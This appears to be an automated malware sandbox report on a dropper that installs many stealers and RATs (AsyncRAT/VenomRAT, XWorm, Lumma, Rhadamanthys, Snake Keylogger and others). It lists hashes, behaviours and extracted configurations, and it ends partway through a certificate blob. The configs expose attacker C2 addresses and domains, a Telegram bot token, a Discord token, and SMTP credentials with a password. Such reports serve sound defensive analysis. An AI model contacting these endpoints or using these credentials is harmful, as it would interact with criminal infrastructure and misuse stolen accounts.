Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
149s -
max time network
145s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
10/12/2024, 14:56
Static task
static1
Behavioral task
behavioral1
Sample
New Text Document mod.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
New Text Document mod.exe
Resource
win10v2004-20241007-en
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
205.209.109.10:4449
205.209.109.10:7723
clgbfqzkkypxjps
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
xworm
-
Install_directory
%ProgramData%
-
install_file
ntoskrnl.exe
-
pastebin_url
https://pastebin.com/raw/5FinF5Mf
-
telegram
https://api.telegram.org/bot6521061783:AAGQkZDgpgjXOESj9-XTf5_ylzpA9XFxUw8/sendMessage?chat_id=5999137434
Extracted
discordrat
-
discord_token
MTMxNTExMzk1MTQwMjUyNDc5Mg.Gr0nG0.RZobhhDSOoVNDV4G6dfAh3s5Qo1p7HVqUhKZ3o
-
server_id
1313949691574226985
Extracted
rhadamanthys
https://95.214.55.177:1689/e21adcd5478c6d21f12/jf923j9f.kd10d2
Extracted
lumma
https://powerful-avoids.sbs/api
https://motion-treesz.sbs/api
https://disobey-curly.sbs/api
https://leg-sate-boat.sbs/api
https://story-tense-faz.sbs/api
https://blade-govern.sbs/api
https://occupy-blushi.sbs/api
https://frogs-severz.sbs/api
https://appear-guides.cyou/api
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.dap.vn - Port:
587 - Username:
[email protected] - Password:
KhAnh110886 - Email To:
[email protected]
Extracted
lumma
https://appear-guides.cyou/api
https://drive-connect.cyou/api
https://covery-mover.biz/api
Signatures
-
Asyncrat family
-
Detect Xworm Payload 3 IoCs
resource yara_rule behavioral1/memory/5628-2501-0x0000000001350000-0x000000000136C000-memory.dmp family_xworm behavioral1/files/0x0005000000019999-2500.dat family_xworm behavioral1/memory/4128-3998-0x00000000008E0000-0x00000000008FC000-memory.dmp family_xworm -
Discord RAT
A RAT written in C# using Discord as a C2.
-
Discordrat family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection svchost.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP svchost.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Rhadamanthys family
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral1/memory/796-3025-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Snakekeylogger family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
description pid Process procid_target PID 4320 created 1196 4320 europe123.exe 21 PID 5952 created 1196 5952 Horizon.pif 21 PID 5952 created 1196 5952 Horizon.pif 21 PID 4064 created 420 4064 powershell.EXE 5 -
resource yara_rule behavioral1/memory/1984-83-0x0000000000FC0000-0x0000000001422000-memory.dmp VenomRAT behavioral1/memory/1984-84-0x0000000000FC0000-0x0000000001422000-memory.dmp VenomRAT -
Venomrat family
-
WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
-
Warzonerat family
-
Xworm family
-
Async RAT payload 2 IoCs
resource yara_rule behavioral1/memory/1984-83-0x0000000000FC0000-0x0000000001422000-memory.dmp family_asyncrat behavioral1/memory/1984-84-0x0000000000FC0000-0x0000000001422000-memory.dmp family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ europe123.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ k1de2zkz.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ H3tyh96.exe -
pid Process 4064 powershell.EXE 7160 powershell.exe 3536 powershell.exe 1084 powershell.exe 1800 powershell.exe 3564 powershell.exe 5892 powershell.exe 6872 powershell.exe 3388 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion europe123.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion k1de2zkz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion k1de2zkz.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Lu4421.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Lu4421.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion H3tyh96.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion europe123.exe -
Drops startup file 6 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs dog.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetup.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk KrnlSetup.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sync360Sphere.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurrentLeaseTime.vbs cat.exe -
Executes dropped EXE 49 IoCs
pid Process 576 wrofile1.exe 1296 wrofile1.exe 2424 wrofile1.exe 1984 H3tyh96.exe 2876 cat.exe 3896 AutoHotkeyU64.exe 1196 Explorer.EXE 6180 Setup.exe 6472 dog.exe 5628 KrnlSetup.exe 5712 Client-built.exe 6048 Z9Pp9pM.exe 6108 profile1.exe 6160 profile1.exe 6220 profile1.exe 6568 images.exe 6896 images.exe 6920 images.exe 1664 C1J7SVw.exe 6468 7z.exe 2336 7z.exe 2564 7z.exe 6588 7z.exe 5156 7z.exe 5604 7z.exe 6040 7z.exe 5472 7z.exe 6156 in.exe 5100 pSRrNpLv0bS37RA.exe 6624 Loader.exe 4320 europe123.exe 4832 l3bevvn7.exe 5048 pSRrNpLv0bS37RA.exe 5440 k1de2zkz.exe 2648 d8rb24m3.exe 324 Lu4421.exe 2464 lega.exe 3748 lega.exe 1632 g9win6bb.exe 2008 dmn6qzwr.exe 5952 Horizon.pif 2160 kxfh9qhs.exe 472 services.exe 3384 xtoxzfwgupjk.exe 4128 ntoskrnl.exe 4152 Intel_PTT_EK_Recertification.exe 4256 App.exe 5016 App.exe 5548 RegAsm.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Wine H3tyh96.exe -
Loads dropped DLL 64 IoCs
pid Process 576 wrofile1.exe 576 wrofile1.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 1196 Explorer.EXE 2944 New Text Document mod.exe 1196 Explorer.EXE 6404 WerFault.exe 6404 WerFault.exe 6404 WerFault.exe 6404 WerFault.exe 2944 New Text Document mod.exe 6404 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5852 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 5960 WerFault.exe 6108 profile1.exe 6108 profile1.exe 6160 profile1.exe 668 cmd.exe 6468 7z.exe 668 cmd.exe 2336 7z.exe 668 cmd.exe 2564 7z.exe 668 cmd.exe 6588 7z.exe 668 cmd.exe 5156 7z.exe 668 cmd.exe 5604 7z.exe 668 cmd.exe 6040 7z.exe 668 cmd.exe 5472 7z.exe 668 cmd.exe 668 cmd.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 4320 europe123.exe 2944 New Text Document mod.exe 2944 New Text Document mod.exe 2464 lega.exe 5424 cmd.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 3156 WerFault.exe 472 services.exe 3700 taskeng.exe 3700 taskeng.exe 2944 New Text Document mod.exe 4256 App.exe 5016 App.exe 5952 Horizon.pif 5548 RegAsm.exe -
Uses the VBS compiler for execution 1 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Images = "C:\\ProgramData\\images.exe" profile1.exe Set value (str) \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntoskrnl = "C:\\ProgramData\\ntoskrnl.exe" KrnlSetup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA k1de2zkz.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA europe123.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 11 IoCs
flow ioc 70 raw.githubusercontent.com 71 raw.githubusercontent.com 72 raw.githubusercontent.com 69 raw.githubusercontent.com 73 raw.githubusercontent.com 86 raw.githubusercontent.com 30 pastebin.com 31 pastebin.com 32 raw.githubusercontent.com 33 raw.githubusercontent.com 68 raw.githubusercontent.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com 61 checkip.dyndns.org -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 2804 powercfg.exe 2248 powercfg.exe 5088 powercfg.exe 5036 powercfg.exe 2312 powercfg.exe 1768 powercfg.exe 1412 powercfg.exe 3856 powercfg.exe -
Drops file in System32 directory 6 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe xtoxzfwgupjk.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\system32\MRT.exe l3bevvn7.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4976 tasklist.exe 5168 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 1984 H3tyh96.exe 4320 europe123.exe 5440 k1de2zkz.exe -
Suspicious use of SetThreadContext 15 IoCs
description pid Process procid_target PID 576 set thread context of 1296 576 wrofile1.exe 32 PID 576 set thread context of 2424 576 wrofile1.exe 33 PID 6108 set thread context of 6160 6108 profile1.exe 47 PID 6108 set thread context of 6220 6108 profile1.exe 48 PID 6568 set thread context of 6896 6568 images.exe 50 PID 6568 set thread context of 6920 6568 images.exe 51 PID 2464 set thread context of 3748 2464 lega.exe 98 PID 5100 set thread context of 796 5100 pSRrNpLv0bS37RA.exe 105 PID 5048 set thread context of 6108 5048 pSRrNpLv0bS37RA.exe 129 PID 4832 set thread context of 3832 4832 l3bevvn7.exe 140 PID 3384 set thread context of 2504 3384 xtoxzfwgupjk.exe 161 PID 3384 set thread context of 5964 3384 xtoxzfwgupjk.exe 164 PID 3384 set thread context of 5376 3384 xtoxzfwgupjk.exe 168 PID 4152 set thread context of 4700 4152 Intel_PTT_EK_Recertification.exe 176 PID 4064 set thread context of 5912 4064 powershell.EXE 182 -
resource yara_rule behavioral1/memory/668-2688-0x000000013F0A0000-0x000000013F530000-memory.dmp upx behavioral1/memory/6156-2693-0x000000013F0A0000-0x000000013F530000-memory.dmp upx behavioral1/memory/6156-2690-0x000000013F0A0000-0x000000013F530000-memory.dmp upx behavioral1/memory/4152-4000-0x000000013FBB0000-0x0000000140040000-memory.dmp upx behavioral1/memory/4152-4089-0x000000013FBB0000-0x0000000140040000-memory.dmp upx -
Drops file in Windows directory 5 IoCs
description ioc Process File opened for modification C:\Windows\MiddleOrganize g9win6bb.exe File created C:\Windows\wusa.lock wusa.exe File created C:\Windows\wusa.lock wusa.exe File opened for modification C:\Windows\EmotionalCnet g9win6bb.exe File opened for modification C:\Windows\NigerMauritius g9win6bb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3644 sc.exe 3548 sc.exe 2736 sc.exe 2984 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 5960 6472 WerFault.exe 40 -
System Location Discovery: System Language Discovery 1 TTPs 41 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wrofile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language H3tyh96.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dmn6qzwr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kxfh9qhs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pSRrNpLv0bS37RA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language k1de2zkz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Z9Pp9pM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d8rb24m3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegAsm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language images.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pSRrNpLv0bS37RA.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dialer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language profile1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lega.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lega.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Horizon.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C1J7SVw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language europe123.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g9win6bb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2476 powershell.exe 4288 PING.EXE 4904 powershell.exe 5612 PING.EXE -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f03ff1e3134bdb01 powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 lega.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a lega.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 H3tyh96.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a H3tyh96.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 H3tyh96.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e H3tyh96.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 New Text Document mod.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a07